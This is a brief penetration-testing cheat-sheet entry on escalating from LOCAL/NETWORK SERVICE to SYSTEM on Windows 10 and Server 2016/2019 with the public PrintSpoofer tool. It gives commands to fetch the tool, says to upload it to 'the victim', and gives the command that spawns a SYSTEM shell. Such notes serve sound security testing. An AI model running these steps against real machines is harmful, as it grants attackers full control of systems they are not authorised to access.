Windows privilege escalation technique. From LOCAL/NETWORK SERVICE to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 and Server 2016/2019.
Use this technique when winPEAS or “whoami /priv” says the the account has “SeImpersonatePrivilege”.
Download
See GitHub.
git clone https://github.com/itm4n/PrintSpoofer.git
There is a problem with compilation of PrintSpoofer under Kali. Download the pre-compiled version.
wget https://github.com/dievus/printspoofer/raw/master/PrintSpoofer.exeUpload the file to the victim
Use Impacket. See File Transfer.
EXE FILES MUST BE TRANSFERRED AS BINARY.
Execute PrintSpoofer
C:\<some path>\PrintSpoofer.exe -i -c cmd.exe